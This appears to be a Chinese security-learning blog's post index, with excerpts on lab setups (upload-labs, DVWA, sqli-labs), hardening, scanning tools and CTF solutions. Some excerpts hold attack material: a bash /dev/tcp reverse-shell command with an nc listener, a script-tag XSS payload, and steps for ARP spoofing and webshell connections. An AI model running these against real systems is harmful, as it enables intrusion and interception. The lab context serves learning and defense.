安全
Lu__xiao
记录学习
展开
-
upload-labs-1
打开第一关通过查看源码我们可以发现第一关属于前端验证我们可以将浏览器JS代码禁用掉,禁用JavaScript直接上传成功了,但是这种方法在实战中会导致某些功能无法显示第二种方法 我们通过burp 去修改这里我修改了文件后缀,因为前端验证如果是php后缀,前端无法上传,我们又需要上传php文件点击上传,这时burp已经抓到包了,我们去修改文件后缀为php修改后直接放行,就可以看到上传成功...原创 2022-02-24 18:00:58 · 531 阅读 · 0 评论 -
xss-level1
首先搭建xss靶场打开浏览器输入地址来到第一关这里我先查看了一下源代码先试一下弹出会话框name=<script>alert(1);</script>可以看到直接弹出来了页面原创 2022-02-24 16:22:11 · 4061 阅读 · 0 评论 -
DNS查询
DNS域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。互联网中的地址是数字的IP地址,域名解析的作用.原创 2022-01-16 21:59:01 · 4504 阅读 · 2 评论 -
子域名收集
一、首先我们要了解子域名收集是什么?1. 子域名收集可以显示很多域名或者子域名,它们在安全评估的范围内,从而增加了发现漏洞的机会。2. 发现运行在隐藏的、被遗忘的子域名上的应用程序可以使我们发现关键的漏洞。3.通常情况下,同一组织的不同域名或应用程序会出现相同的漏洞。4. 在渗透中我们通常需要通过信息收集手段来了解目标的一些情况,一般而言网站主页的安全比较被重视,同理也就更难有漏洞让我们攻击,这时我们就需要利用子域名收集。子域名收集在线网站www.virustotal.com.原创 2022-01-16 21:20:37 · 3891 阅读 · 1 评论 -
蚁剑渗透测试
一、应用场景 对于本实验,我的理解是基于对方服务器存在文件上传漏洞,已经被上传一句话木马,这时我们通过蚁剑去做一个渗透攻击,目标是控制对方的服务器。实验目标:1. 学会蚁剑的攻击方法; 2. 通过 Wireshark 抓取数据包进行分析;本次实验需要一个攻击方和服务器这里本机为服务器 IP地址:192.168.0.142环境需求:phpstudy (模拟服务器)、Wireshark 抓包工具(进行抓宝分析)虚拟机...原创 2022-01-15 00:42:52 · 3898 阅读 · 0 评论 -
burp抓包工具
打开burp工具修改监听地址端口修改浏览器的代理访问一个网页这里burp已经获取到请求数据包了这里可以修改该数据包的参数然后进行放包原创 2022-01-13 21:17:21 · 2627 阅读 · 0 评论 -
DVWA搭建
dvwa文件放在WWW目录下修改config下的config.inc.php文件用户名和密码开启服务创建该网站访问验证原创 2022-01-13 21:06:23 · 479 阅读 · 0 评论 -
sqli搭建
使用小皮的MySQL服务把sqli文件夹放在WWW目录下修改sql-connnections下的db-creds.inc里面的用户名和密码开启服务这里需要注意PHP版本不要过高不然会导致不兼容打开浏览器输入网址验证这里就可以了...原创 2022-01-13 20:59:00 · 372 阅读 · 0 评论 -
cain 工具
安装cain工具下一步下一步就完成了启动工具点击 Sniffer 启动监听功能点击 sniffer 右击空白点击 scan MAC Address弹窗出来选择监听端口扫描整个网站此时可以看到其他主机的 IP 和 网关点击右下角的 ARP 标识,再点击菜单栏的 add to list选择目标网关和 IP此时监听会话建立起来点击左上角黄色 ARP 按钮 启动 ARP 欺骗查看 arp 表通过网页登...原创 2022-01-04 17:59:47 · 2747 阅读 · 1 评论 -
防火墙部署
透明模式:和傻瓜交换机一样,不需要做任何配置,虚拟网线模式:配对绑定 形成接口对 一个数据从一个一段进只能从另一端出去 它不需要查 MAC 地址表 效率更高混合模式IPS:入侵防御系统,事中防御,能够监视网络或网络设备的网络资料传输行为的计算机网络安全设备,能够及时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。服务器:FTP协议、POP3、DNS、中间件漏洞、弱口令防护客户端:蠕虫病毒、后门漏洞、AV:杀毒网关、过滤邮件WAF:用于防御web服务器的漏洞、we原创 2021-12-30 10:51:50 · 256 阅读 · 0 评论 -
主机加固1
从安全上暴力破解:首先我们要避免弱口令的暴力破解,去增强密码强度和登陆错误几次锁定,然后把无用账户给删除掉、避免提权 端口攻击:查看端口开放情况、高危端口、无用端口关闭,必须开的端口可以修改端口号 横向渗透:把敏感信息删除、及时删除浏览记录,账户密码等敏感信息不保存在电脑从策略上账户策略:无用账户可以先禁用后删除,比如guest(来宾账户) 密码策略:密码长度、复杂度,减少重复密码 屏幕锁定策略:屏幕锁定开启情况,多长时间无操作锁定 使用IP与MAC地址绑定 防火墙:防火墙开启.原创 2021-12-21 16:46:02 · 2427 阅读 · 0 评论 -
NMAP工具的使用:端口扫描
Nmap是端口扫描工具目标填写IP地址这里是虚拟机的命令也就是配置这里用的是intense scan扫描后得到下图端口情况主机情况...原创 2021-12-18 09:59:54 · 2339 阅读 · 0 评论 -
超级弱口令工具
打开弱口令工具勾选ssh 目标填写IP地址 账户也可以去做账户本 导入密码本 开始检查排查方式可以通过查看系统登陆日志查看登陆情况同时可以进行限制比如账户登陆5次错误5分钟之内不能再次登陆增大暴力破解的时间成本...原创 2021-12-18 09:52:32 · 5863 阅读 · 0 评论 -
反弹shell:lvvp;python;perl ;ruby ;php;lun;awk;
环境 kali center OS 7 基于已经渗透成功kali 的IP地址lvvp确定环境 可以使用 lvvp 命令去查看kali上执行监视端口 nc -lvvp port 端口号nc -lvvp 10000在center OS 上执行 bash -i >& /dev/tcp/攻击主机ip/10000 0>&1 IP地址/端口号bash -i >& /de...原创 2021-11-26 20:14:10 · 691 阅读 · 0 评论 -
一句话木马
Java环境、哥斯拉 虚拟机需要有lamp打开哥斯拉左上角管理生成密码密钥选择默认即可荷载选择php 加密器可以任选这里生成文件名后缀.php生成后移动到 /var/www/html 下这时就可以去访问网页,得到的是空白返回哥斯拉 点击目标,添加url 是自己的链接 密码密钥我们没有设置默认就可以 载荷和加密器修改成自己的就可以可以先测试连接再去添加...原创 2021-11-27 09:34:57 · 297 阅读 · 0 评论 -
微步注册使用
微步原创 2021-11-27 17:37:31 · 662 阅读 · 0 评论 -
攻防世界web、web shell关卡使用中国蚁剑
访问web shell关卡进入此网站,得到下面一句话打开蚁剑,右击空白,添加数据URL 填写网站地址 密码shell 点击添加连接后在网站目录下可以看到flag.txt文件 里面放置flagindex.php文件 里面放置网站源代码源代码flag:cyberpeace{7d9b52e47e2e775606e7c143f55b398c}webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种...原创 2021-11-30 20:03:37 · 848 阅读 · 0 评论 -
攻防世界 web 009 XFF Referer burp
XFF头:全名X-Forwarded:代表客户端,html请求端的真实 IP 只有通过 HTTP 代理或者负载均衡服务器时才会添加该项(可伪装)用法: X-Forwarded-For:123.123.123.123Referer:Referer 是 HTTP 请求 header 的一部分当浏览器或者模拟浏览器行为向 web 服务器发送请求时,头部会包含 Referer (可伪装)使用 brup 工具 kali 上自带攻防世界 web 新手 009 XFF Refe...原创 2021-11-30 20:44:27 · 1267 阅读 · 0 评论 -
密码学之apache部署https
实验目的掌握apache部署自定义证书的https服务器方法实验环境一台Centos 7.2 已经安装openssl组件,已安装apache httpd,用于搭建https服务器一台windows 10客户端,已安装chrome浏览器实验原理openssl是Linux内置的一款开源工具,实现了常见的密码算法与应用。通过openssl操作,完成各种密码算法的应用。实验步骤一、生成独立的CA1、 生成ca的keyopenssl genrsa -des3.原创 2021-12-06 20:46:50 · 114 阅读 · 0 评论 -
PHP 一句话木马
一句话木马一句话木马制作GET这时去网站显示乱码这时我们添加一条命令header("Content-Type: text/html; charset=gb2312");乱码问题解决 运行成功Post同样的方式、创建文档用Notepad++打开写入POST的木马去访问这个要用F12的方式使用插件去操作...原创 2021-12-03 19:47:07 · 140 阅读 · 0 评论 -
Linux系统加固命令
账户和口令1 cat /etc/shodow //查看有多少用户2 userdel //删除无用账户3 passwd -l //锁定账户4 passwd -u //解锁账户useradd qq //创建一个qq用户passwd -u qq //清除用户密码awk -F: '($3==0)' /etc/passwd //检查root权限用户awk -F: '($2=="")' ...原创 2021-12-07 20:05:59 · 747 阅读 · 0 评论 -
Windows隐藏账户处置
Windows隐藏账户处置原创 2021-12-15 17:46:10 · 747 阅读 · 0 评论 -
Nmap端口扫描工具
Nmap是端口扫描工具使用方法:打开如下图目标填写IP地址这里是虚拟机 cent os 7 的命令也就是配置这里用的是intense scan扫描后得到下图查看端口情况查看主机情况原创 2021-12-17 19:38:44 · 630 阅读 · 0 评论 -
windows系统加固
本地安全组策略账户策略无用账户删除 避免提权密码策略设置密码输入次数不大于10次 错误到一定次数锁定该账户避免弱口令密码 使用期限不大于90天防火墙开启情况出入站规则无用账户删除 避免提权系统版本查看 及时修补漏洞高危端口查看 可以把端口换成不常用的端口 避免被攻击安装防病毒软件...原创 2021-12-09 20:24:53 · 1961 阅读 · 0 评论 -
河马工具的使用
下载地址:SHELLPUB.COM 专注查杀,永久免费应该是官网 我是在这下的打开后如下 简单明了 立即扫描添加扫描路径,这里我已经添加一个了 深度扫描也勾选上 开始扫描扫描结束大家使用安全产品记得及时更新避免出现被 0 dey漏洞攻击...原创 2021-12-17 19:53:32 · 659 阅读 · 0 评论 -
隐藏账户的排除、D盾的使用
前面我们做了如何隐藏账户,那么如果让我们排查怎么搞?这里使用D盾工具虚拟机安装打开 (网上搜就可以)打开后是这个页面 我们右击 以管理员权限运行因为它要获取一些权限打开后是这个页面 下方点击工具点击克隆账户检测这里就发现了我们昨天创建的 test$ 账户D盾的作用很多进程查看流量监控端口查看...原创 2021-12-16 19:49:14 · 1408 阅读 · 0 评论 -
Goby的使用 漏洞扫描工具
获取自己虚拟机的ip打开Goby点击扫描输入虚拟机的IP地址开始扫描扫描结束这里没有扫到漏洞点击报告查看报告右上角下载生成报告漏洞举例原创 2021-12-18 09:21:28 · 8988 阅读 · 1 评论